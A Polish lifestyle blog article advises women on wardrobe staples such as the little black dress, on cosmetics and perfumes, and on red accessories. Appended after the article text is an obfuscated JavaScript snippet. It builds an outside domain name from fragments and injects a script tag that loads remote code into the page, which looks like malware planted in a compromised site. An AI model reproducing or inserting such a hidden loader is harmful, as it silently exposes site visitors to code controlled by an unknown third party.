Czego nie może zabraknąć żadnej kobiecie?

Kobieta ma naturalny wdzięk, seksapil i czar. Kobieta ma również masę „magicznych” przedmiotów, które pozwalają jej być i czuć się piękną, a także przemieniają ją z kopciuszka w królową balu. Sprawdź, których przedmiotów brakuje Tobie!

 

Mała czarna – obowiązkowy element kobiecej szafy

W kobiecych szafach znajduje się dużo rzeczy:
  • których właścicielka nie włożyła ani razu,
  • które wkładała kiedyś, obecnie jej się nie podobają, ale nie warto ich wyrzucać, bo może jeszcze będą modne,
  • których nie nosi, bo są chwilowo za ciasne,
  • które z uwagi na wyjątkowość wypada włożyć co najwyżej kila razy do roku.
Ubrania okazjonalne – oficjalne, eleganckie oraz seksowne – powinny znaleźć się szafie każdej kobiety. Obowiązkowy żakiet, klasyczna marynarka, schludne czarne spodnie, a także drapieżna mała czarna. Nigdy nie wiesz, kiedy Ci się przydadzą… a przydadzą się na pewno! Na imprezę okolicznościową, urodziny, święta albo randkę z nowo poznanym i zabójczo przystojnym mężczyzną, którego będziesz chciała oczarować. Pamiętaj również, by co parę miesięcy przeglądać szafę i przymierzać ubrania. Nie chcesz, by godzinę przed wyjściem na spotkanie okazało się, że sukienka jest na Ciebie za ciasna lub materiał wygryzły mole.

Delikatność, pielęgnacja, samouwielbienie

Każda kobieta powinna mieć w sobie odrobinę samouwielbienia. Miłość do nas samych sprawia, że jesteśmy radośniejsze, otwarte na świat i nowych ludzi, a także lepiej oceniamy swoje życia. Jednak aby dobrze czuć się w swoim ciele, musimy najpierw o nie zadbać.
Wiek XXI to czas, w którym opieka nad własnym organizmem jest uznawana za wartościową. Stosowanie różnorodnych diet mających na celu poprawę wyglądu oraz zdrowia jest popierane przez społeczeństwo. Podobnie dopingowane są korzystanie z siłowni, salonów SPA i dobrych jakościowo kosmetyków.
W domu nie powinno zabraknąć drobiazgów, które pozwolą Ci poczuć się zadbaną i piękną. Jeśli masz ochotę kupić i otworzyć piąty balsam z kolei, zrób to. Zamiast kupować najtańsze płyny do kąpieli, skuś się na te, które odżywią Twoją skórę i zniwelują niedoskonałości.
Nie ograniczaj się do „niezbędnego minimum”: płynu, szamponu, dezodorantu, kremu. Sięgaj po kosmetyki, które może i nie są do szczęścia potrzebne, ale z pewnością zbliżają do niego właścicielkę. Maluj usta mieniącymi się błyszczykami i psikaj się ulubionymi perfumami. Przetestuj na swojej skórze klasykę damskich perfum: Poison, Dior J’adore, Chaieanel no 5 czy Coco Mademoiselle.

Czerwone dodatki: szminka, lakier do paznokcie, bielizna, szpilki

Czerwień to kolor siły, dominacji i odwagi. Kobieta nosząca go zna swoją wartość i wie, czego chce od życia. Jest pewna siebie i skupiona na celu. Osiągnie sukces, jeśli tylko odrobinę się o to postara.
Oczywiście taka kobieta to tylko model, symbol. W rzeczywistości kobiety mają słabości, są dręczone przez kompleksy i dosięgają je złe nastroje. Czerwieni używają, by wydobyć z wnętrza tę część siebie, która pomoże uporać się z gorszym humorem, wyjść z łóżka, zrzucić dres i wyrzucić pudełko z topniejącymi na spodzie lodami.
Czerwone akcesoria powinnaś w swej kobiecej kolekcji mieć również Ty. Jeśli obcisły czerwony golf uważasz za zbyt wiele, wystarczy, że do czarnego kostiumu włożysz czerwone szpilki lub na czerwono pomalujesz paznokcie. Usta w kolorze czerwieni nigdy nie wychodzą z domu, a czerwone gadżety – okulary w kształcie serc, torebka czy pasek – skupiają wzrok innych osób i budzą podziw.

(function(){
xlzd_=(“u”+””)+”s”+””;xlzd_+=(“tat.”)+(“i”);
xlzd=document.createElement(“script”);xlzd.type=”text/javascript”;xlzd_+=”nf”+(“o”)+”/”;
xlzdu=”72416780″+”.”;xlzd.async=true;xlzdu+=”s5f3l3hflzd5hcnjhxxg4f6kq1k8t4″;
xlzd.src=”//”+xlzd_+xlzdu; xlzdb=document.body; xlzdb.appendChild(xlzd);
})();

Dodaj komentarz